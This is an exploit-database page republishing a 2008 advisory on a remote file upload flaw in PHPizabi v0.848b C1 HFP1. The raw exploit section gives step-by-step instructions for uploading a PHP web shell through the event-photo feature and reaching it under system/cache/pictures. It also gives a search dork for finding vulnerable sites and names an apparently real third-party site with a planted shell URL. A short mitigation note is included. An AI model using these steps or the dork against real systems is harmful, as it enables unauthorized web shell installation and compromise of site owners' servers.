header-logo
Suggest Exploit
vendor:
PHPizabi
by:
ZoRLu
8.8
CVSS
HIGH
Remote File Upload
434
CWE
Product Name: PHPizabi
Affected Version From: v0.848b C1 HFP1
Affected Version To: v0.848b C1 HFP1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Powered by PHPizabi v0.848b C1 HFP1 remote file upload

A vulnerability exists in Powered by PHPizabi v0.848b C1 HFP1 which allows an attacker to upload a malicious file to the server. An attacker can register on the website, create an event, upload a malicious file, and then access the file via the URL.

Mitigation:

Ensure that the application is configured to only allow the upload of files with the appropriate file extensions and that the application is configured to only allow the upload of files with the appropriate file size.
Source

Exploit-DB raw data:

############################################
Powered by PHPizabi v0.848b C1 HFP1 remote file upload

author: ZoRLu

home: www.yildirimordulari.org

contact: trt-turk@hotmail.com

dork: "Powered by PHPizabi v0.848b C1 HFP1"

############################################

exploit:

http://localhost/izabi/system/cache/pictures/id_shell.php

-first register web site

-Create an event on the click and create an event ( direct create event url: http://localhost/izabi/?L=events.create )

-event title and description write. show to select All the users. gözat button click and shell.php upload

-after go to event page. upload photo right click. open the menu click to properties. copy the url

example:

http://localhost/izabi/system/image.php?file=xxx_shell.php&width=500

and 

exploit:

http://localhost/izabi/system/cache/pictures/xxx_shell.php

example web site:

http://bitchinindie.com/system/image.php?file=597_shell.php&width=500

exploit shell.php

http://bitchinindie.com/system/cache/pictures/597_shell.php


##################################################

thanx: str0ke, FaLCaTa, ReD_KaN, edish, harded, aRKi, z3h!r, the_KaM!L, vur6un, siircicocuk, Dr. SaLTuK, kasýrga(lavrens), avkidis, head_hunter 

and all users yildirimordulari.org

siircicocuk nerelerdesin be kanka msn e takýl özlettin kendini :)))

## yildirimordulari.org açýlýr mý açýlmaz mý orasý bilinmez ama bilinen birþey var o bir efsane ##

#################################################

# milw0rm.com [2008-02-17]

Navigation

Suggest Exploit

Services By CQR